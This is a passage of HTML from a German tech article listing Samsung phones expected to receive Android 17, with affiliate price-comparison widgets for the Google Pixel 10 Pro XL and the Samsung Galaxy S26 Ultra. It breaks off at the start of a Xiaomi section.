							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0-wf3x6w5bMRDMrEUYsO-mzWIcpmOMot0xPOkMPEUMv5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dt_XDLksSZSGDZtwn_8yKsuxZKjF1HtpC73Azvf-EPSrdsZLYOSPHIRjFOVFXHH32&amp;mid=685509711926&amp;id=685509711926&amp;ts=20260621&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=0-wf3x6w5bMRDMrEUYsO-mzWIcpmOMot0xPOkMPEUMv5p11Pk4U7aVp7o4zpgRdnokZKpwcYI7dt_XDLksSZSGDZtwn_8yKsuxZKjF1HtpC73Azvf-EPSrdsZLYOSPHIRjFOVFXHH32&amp;mid=685509711926&amp;id=685509711926&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="939,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 939,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.076,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=_T23bFBYxEuRDMrEUYsO-lVt6WZAp33cQaVONtFskVz1g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt_XDLksSZSFpY0-EOCde7PJy4HCy7jhQJO-b31T0VW8&amp;mid=686106102329&amp;id=686106102329&amp;ts=20260621&amp;log=rss" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=_T23bFBYxEuRDMrEUYsO-lVt6WZAp33cQaVONtFskVz1g7_hVoNHUkNR6XImhoGB4kZKpwcYI7dt_XDLksSZSFpY0-EOCde7PJy4HCy7jhQJO-b31T0VW8&amp;mid=686106102329&amp;id=686106102329&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.076,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.076,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Google</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/de/config/pixel_10_pro?hl=de&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiY0dsNFpXeGZNVEJmY0hKdiIsInZhcmlhbnRzIjpbWyI3IiwiTVRNPSJdXX0%3D" data-vars-product-name="Google Pixel 10 Pro XL" data-vars-product-id="2885458" data-vars-category="Smartphones" data-vars-manufacturer-id="10535" data-vars-manufacturer="Google" data-vars-vendor="billiger,gtin,amazon,mpn,Google" data-vars-po="billiger,gtin,amazon,mpn" data-product="2885458" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.jdoqocy.com/click-1676582-14506529?sid=rss&amp;url=https://store.google.com/de/config/pixel_10_pro?hl=de&amp;selections=eyJwcm9kdWN0RmFtaWx5IjoiY0dsNFpXeGZNVEJmY0hKdiIsInZhcmlhbnRzIjpbWyI3IiwiTVRNPSJdXX0%3D" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Google" aria-label="Deal anschauen bei Google für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Samsung</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378ef9c4051"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/Samsung-Galaxy-S26-Ultra-review-7.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Samsung Galaxy S26 Ultra review 7" class="wp-image-3082181" width="1200" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Luke Baker</p></div>



<p>Samsung versorgt seine aktuellen Smartphones länger mit Updates als eigentlich vorgeschrieben. Die Top-Modelle bekommen heute bis zu sieben Generationen an Android-Upgrades, einige A-Modelle zumindest für sechs Generationen.</p>



<p>Für einige Budget-Modelle fehlen genaue Angaben. Nach unserem Stand müssten diese Samsung-Smartphones aber Android 17 erhalten:</p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3108173/samsung-galaxy-s26-test.html" target="_blank" rel="noreferrer noopener">Galaxy S26</a> / <a href="https://www.pcwelt.de/article/3084364/samsung-galaxy-s26-plus-test.html" target="_blank" rel="noreferrer noopener">S26+</a> / <a href="https://www.pcwelt.de/article/3084372/samsung-galaxy-s26-ultra-test-2.html" target="_blank" rel="noreferrer noopener">S26 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2898610/galaxy-s25-fe-hands-on.html" target="_blank" rel="noreferrer noopener">Galaxy S25 FE</a></li>



<li><a href="https://www.pcwelt.de/article/2800144/samsung-galaxy-s25-edge-test.html" target="_blank" rel="noreferrer noopener">Galaxy S25 Edge</a></li>



<li><a href="https://www.pcwelt.de/article/2604993/samsung-galaxy-s25-test.html" target="_blank" rel="noreferrer noopener">Galaxy S25</a> / <a href="https://www.pcwelt.de/article/2625286/samsung-galaxy-s25-plus-test.html" target="_blank" rel="noreferrer noopener">S25+</a> / <a href="https://www.pcwelt.de/article/2605138/samsung-galaxy-s25-ultra-test-2.html" target="_blank" rel="noreferrer noopener">S25 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2471013/samsung-galaxy-s24-fe-vorgestellt-3-wichtige-upgrades-fuer-das-guenstigere-modell.html" target="_blank" rel="noreferrer noopener">Galaxy S24 FE</a></li>



<li><a href="https://www.pcwelt.de/article/2287812/samsung-galaxy-s24-test.html" target="_blank" rel="noreferrer noopener">Galaxy S24 </a>/ <a href="https://www.pcwelt.de/article/2285159/samsung-galaxy-s24-plus-test.html" target="_blank" rel="noreferrer noopener">S24+</a> / <a href="https://www.pcwelt.de/article/2220194/samsung-galaxy-s24-ultra-test.html" target="_blank" rel="noreferrer noopener">S24 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/1486833/samsung-galaxy-s23-ultra-test.html" target="_blank" rel="noreferrer noopener">Galaxy S23 / S23+</a> / <a href="https://www.pcwelt.de/article/1506767/samsung-galaxy-s23-ultra-im-test.html" target="_blank" rel="noreferrer noopener">S23 Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/3119761/samsung-galaxy-a57-test.html" target="_blank" rel="noreferrer noopener">Galaxy A57</a></li>



<li><a href="https://www.pcwelt.de/article/3140779/samsung-galaxy-a37-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A37</a></li>



<li><a href="https://www.pcwelt.de/article/2969981/samsung-galaxy-a17-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A17 5G</a></li>



<li><a href="https://www.pcwelt.de/article/2653268/samsung-galaxy-a16-test.html" target="_blank" rel="noreferrer noopener">Galaxy A16</a></li>



<li><a href="https://www.pcwelt.de/article/2262254/samsung-galaxy-a25-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A25</a></li>



<li>Galaxy A26</li>



<li><a href="https://www.pcwelt.de/article/2654481/samsung-galaxy-a36-test-2.html" target="_blank" rel="noreferrer noopener">Galaxy A36</a></li>



<li><a href="https://www.pcwelt.de/article/2771730/samsung-galaxy-a56-test-2.html" target="_blank" rel="noreferrer noopener">Galaxy A56</a></li>



<li>Galaxy A35</li>



<li>Galaxy A55</li>



<li><a href="https://www.pcwelt.de/article/1782064/samsung-galaxy-a54-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A54</a></li>



<li><a href="https://www.pcwelt.de/article/1813124/samsung-galaxy-a34-5g-test.html" target="_blank" rel="noreferrer noopener">Galaxy A34</a></li>



<li>Galaxy M54</li>



<li>Galaxy M35</li>



<li><a href="https://www.pcwelt.de/article/2843601/samsung-galaxy-z-fold-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 7</a></li>



<li><a href="https://www.pcwelt.de/article/2843699/samsung-galaxy-z-flip-7-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 7</a></li>



<li><a href="https://www.pcwelt.de/article/2420827/samsung-galaxy-z-fold-6-test-nicht-neu-aber-definitiv-verbessert.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 6</a></li>



<li><a href="https://www.pcwelt.de/article/2408951/test-samsung-galaxy-z-flip-6-es-dreht-sich-alles-um-ki.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 6</a></li>



<li><a href="https://www.pcwelt.de/article/2033820/samsung-galaxy-z-fold-5-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Fold 5</a></li>



<li><a href="https://www.pcwelt.de/article/2024386/samsung-galaxy-z-flip-5-test.html" target="_blank" rel="noreferrer noopener">Galaxy Z Flip 5</a></li>
</ul>



<p><strong>Voraussichtlich kein Android-Update mehr: </strong>Galaxy S22 / S22+ / S22 Ultra, S21 FE, A53, A73, XCover 6 Pro, Z Fold4, Z Flip4.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/1204479/test-das-beste-samsung-galaxy-smartphone.html" target="_blank" rel="noreferrer noopener">Die besten Samsung Galaxy Smartphones aller Preisklassen im Test</a></p>



<p><strong>Samsung Galaxy S26 Ultra im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>949,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9gGikLvY_phgvrhhe5GGHcEGhGa7rMLZtVErWYGn16JyC-LUwd_4zSfPkoufsEvn_Sl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686084161645&amp;id=686084161645&amp;ts=20260621&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=9gGikLvY_phgvrhhe5GGHcEGhGa7rMLZtVErWYGn16JyC-LUwd_4zSfPkoufsEvn_Sl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686084161645&amp;id=686084161645&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="949,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 949,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>949,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=B0A4_H_kyougFdiMIpCMzMeIgpOoWTPmb7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260621&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=B0A4_H_kyougFdiMIpCMzMeIgpOoWTPmb7nY_gEpKI5He66dKLCcTskzmk7s2ctpvSl923nsGZ8vE30bjvaFmhcExcfMRGQgECdBHof2fasebWCvty-nT57ZJFUfe4jgSCMIMJod4ad&amp;mid=686062104457&amp;id=686062104457&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="949,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 949,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.018,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8m9HflUHosRgvrhhe5GGHf7XY1VZtNU7apAHkXWzHeXD2eBKnwuxU1ONt2jyH31IhfEAy_wPG8EgFsXVqwGdMqJ9o1ONUu-LFMhaQPl9-p0k-uDdHhV-LorRx0ji2bv_B4ES914SkLk&amp;mid=686413404051&amp;id=686413404051&amp;ts=20260621&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=8m9HflUHosRgvrhhe5GGHf7XY1VZtNU7apAHkXWzHeXD2eBKnwuxU1ONt2jyH31IhfEAy_wPG8EgFsXVqwGdMqJ9o1ONUu-LFMhaQPl9-p0k-uDdHhV-LorRx0ji2bv_B4ES914SkLk&amp;mid=686413404051&amp;id=686413404051&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.018,90 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.018,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record amazon_forth_place ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/12137.png" alt="Boomstore" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.151,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=t49twK2DUkrRDMrEUYsO-lVt6WZAp33caq82Pe-OiA11g7_hVoNHUliTBCp1hTCDqI4j3j7iWFlyDgZhaUo0f6m3nz8dOk09TWHqMtwqt_4DZX44FLpfzVJpxff84ORah4ES914SkLk&amp;mid=686110956402&amp;id=686110956402&amp;ts=20260621&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=t49twK2DUkrRDMrEUYsO-lVt6WZAp33caq82Pe-OiA11g7_hVoNHUliTBCp1hTCDqI4j3j7iWFlyDgZhaUo0f6m3nz8dOk09TWHqMtwqt_4DZX44FLpfzVJpxff84ORah4ES914SkLk&amp;mid=686110956402&amp;id=686110956402&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.151,00 €" data-vars-product-vendor="Boomstore" aria-label="Deal anschauen bei Boomstore für 1.151,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-prime-logo.svg" alt="Amazon Prime" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.179,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="prime" data-vars-product-price="1.179,00 €" data-vars-product-vendor="Amazon Prime" aria-label="Deal anschauen bei Amazon Prime für 1.179,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.199,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G58WV8XS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="1.199,99 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 1.199,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/10729.png" alt="expert TechnoMarkt" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.379,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uyGu_6XD6dktiDOfdN0LnJe3tbSWKwr5Q-83Kv8zhzSEbEokfk-c7D__ecxGdSDN7oFn43uV-nFaEmlykUvpU5LdOrEl8NlozMdBY5bCkNVIsjqVD5uBARxBMizrH_m_OhOmf5U6z-u&amp;mid=686110970286&amp;id=686110970286&amp;ts=20260621&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=uyGu_6XD6dktiDOfdN0LnJe3tbSWKwr5Q-83Kv8zhzSEbEokfk-c7D__ecxGdSDN7oFn43uV-nFaEmlykUvpU5LdOrEl8NlozMdBY5bCkNVIsjqVD5uBARxBMizrH_m_OhOmf5U6z-u&amp;mid=686110970286&amp;id=686110970286&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.379,00 €" data-vars-product-vendor="expert TechnoMarkt" aria-label="Deal anschauen bei expert TechnoMarkt für 1.379,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/9553666945" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/9553666945" data-vendor-api="shopping24" data-vars-product-price="1.429,99 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.429,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260621&amp;log=rss" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=TaM1-5078emXVSmyu4TSBM21GiGtW1fN8NR0CfH9Boz5p11Pk4U7aXFlvu16PzmZlKfpa4qJRMyifaNTjVLvixyDS-vUb8z9_tRlyLJ07ivmvW-bb1CMpv-36FjQGAbl_Jy4HCy7jhQJO-b31T0VW8&amp;mid=686062118222&amp;id=686062118222&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.429,99 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.429,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/samsung-logo.svg" alt="Samsung" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.449,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-name="Samsung Galaxy S26 Ultra" data-vars-product-id="3082778" data-vars-category="Smartphones" data-vars-manufacturer-id="11290" data-vars-manufacturer="Samsung" data-vars-vendor="billiger,amazon,gtin,mpn,Samsung" data-vars-po="billiger,amazon,gtin,mpn" data-product="3082778" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=14815&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.samsung.com/de/smartphones/galaxy-s26-ultra/buy/" data-vars-product-price="1.449,00 €" data-vars-product-vendor="Samsung" aria-label="Deal anschauen bei Samsung für 1.449,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Xiaomi</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378ef9cb82f"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/PXL_20260310_145909935.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Xiaomi 17 kameror" class="wp-image-3086446" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mattias Inghe</p></div>



<p>Xiaomi ist nicht immer eindeutig mit den eigenen Update-Versprechen. Es gibt aber noch viele aktuelle Geräte, die Teil des Update-Zyklus sein dürften.</p>



<p>Xiaomi liefert Android 17 daher voraussichtlich an folgende Geräte aus:</p>



